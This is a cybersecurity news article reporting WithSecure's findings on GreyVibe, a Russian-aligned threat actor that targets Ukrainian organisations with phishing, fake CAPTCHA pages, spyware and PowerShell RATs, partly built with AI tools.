**GreyVibe** has been active since at least August 2023, using a diverse set of custom malware tools and sophisticated social engineering tactics. While researchers at **WithSecure** cannot definitively classify the group as a nation-state operation, the activity aligns with Russian state interests. **Campaign Overview** **WithSecure** discovered the activity in January 2024, revealing a focus on Ukrainian organizations. Indicators such as malware panel language, code comments, and command-and-control (C2) server time configured to UTC+3 (Moscow time) support the link to a Russian-speaking threat actor. GreyVibe employs several attack chains, including: * **PhantomMail**: Spear-phishing emails delivering malicious ZIP/RAR archives via **Google Drive** and 4sync links. These emails use decoy PDFs or fake errors while deploying malware, impersonating Ukrainian government, emergency, telecom, and energy entities. * **PhantomClick**: Fake CAPTCHA/ClickFix pages disguised as **Zoom** and LAPAS sites trick victims into running self-infecting commands through fake **Cloudflare** verification prompts. * **PrincessClub**: Fake Ukrainian adult/dating websites delivering **FallSpy** Android spyware and **PhantomRelay**/**LegionRelay** Windows malware. The operators use fake female **Telegram** personas and WebRTC-based live calls to capture the victim's audio/video. * **DroneLink**: Fake Ukrainian military charity websites themed around FPV drones and UAVs, sharing infrastructure and tooling with PrincessClub campaigns. * **Nebo**: Fake “СПО НЕБО” Russian military communications login pages, likely designed to trick Ukrainian military personnel into believing they were accessing a Russian military terminal. **AI-Powered Lures and Tool Development** The quality and diversity of these lures are attributed to the use of AI tools, including **ChatGPT**, **Ideogram AI**, and **Google Gemini**, to generate detailed and realistic content. <div> <figure><img width="800" src="https://www.bleepstatic.com/images/news/u/1100723/GreyVibe_LLM.webp" height="493" alt="LLM markers in images used by GreyVibe"><figcaption><strong>LLM markers in images used by GreyVibe</strong><br><em>source: WithSecure</em></figcaption></figure> </div> AI also assists in the creation of tools like **LOOKVALPS**, **LOOKVALJS**, **DAYLIGHT**, and **TEASOUP**, all custom obfuscators likely developed with LLM assistance. A PowerShell-based remote access trojan named **LegionRelay** was also likely developed with AI tools, according to researchers. LegionRelay supports file theft, screenshot capturing, browser credential theft, **Telegram** and **WhatsApp** data exfiltration, and RDP access setup. Another malware used by GreyVibe is **PhantomRelay**, also a PowerShell RAT. The malware supports system fingerprinting, dynamic script loading, and PowerShell and Windows command execution. <div> <figure><img width="900" src="https://www.bleepstatic.com/images/news/u/1220909/2026/May/overview(1).jpg" height="231" alt="Overview of malware and campaign associations"><figcaption><strong>Overview of malware and campaign associations</strong><br><em>Source: WithSecure</em></figcaption></figure> </div> The **FallSpy** Android spyware, used in the PrincessClub and Nebo campaigns, is designed for intelligence gathering. It collects contact lists, call logs, device and network information, location data, media files, and SIM information. **Cybercriminal Ties and Uncertainties** **WithSecure** notes that while GreyVibe's activity resembles a nation-state operation, the threat actor lacks the sophistication and operational discipline typically associated with mature state-sponsored groups. The use of **PhantomRelay** in cybercrime activity further complicates the picture. Early and test samples used a unique ISO builder associated with a group of former **TrickBot** members (UAC-0098) that targeted Ukraine at the start of the Russian invasion. Additionally, the threat actor uploaded development and test samples to public scanning platforms, an atypical behavior for nation-state actors. A cryptocurrency miner was also deployed on some victim machines. Researchers remain uncertain whether former or current cybercriminal members have been absorbed into a state-backed group, operate independently with state-directed tasking, or have formed a hybrid team. Organizations can defend against GreyVibe's malicious activity using the [indicators of compromise](http://github.com/WithSecureLabs/iocs/blob/master/GREYVIBE/greyvibe_iocs.csv) (IoCs) provided by **WithSecure**. <div> <p><a rel="noopener nofollow" href="https://hubs.li/Q048zztN0"><img src="https://www.bleepstatic.com/c/p/validation-gap.jpg" data-src="https://www.bleepstatic.com/c/p/validation-gap.jpg" alt="article image"></a></p> <div> <h2><a rel="noopener nofollow" href="https://hubs.li/Q048zztN0">The Validation Gap: Automated Pentesting Answers One Question. You Need Six.</a></h2> <p>Automated pentesting tools deliver real value, but they were built to answer one question: can an attacker move through the network? They were not built to test whether your controls block threats, your detection rules fire, or your cloud configs hold.</p> <p>This guide covers the 6 surfaces you actually need to validate.</p> <p><a rel="noopener nofollow" href="https://hubs.li/Q048zztN0">Download Now</a></p> </div> </div>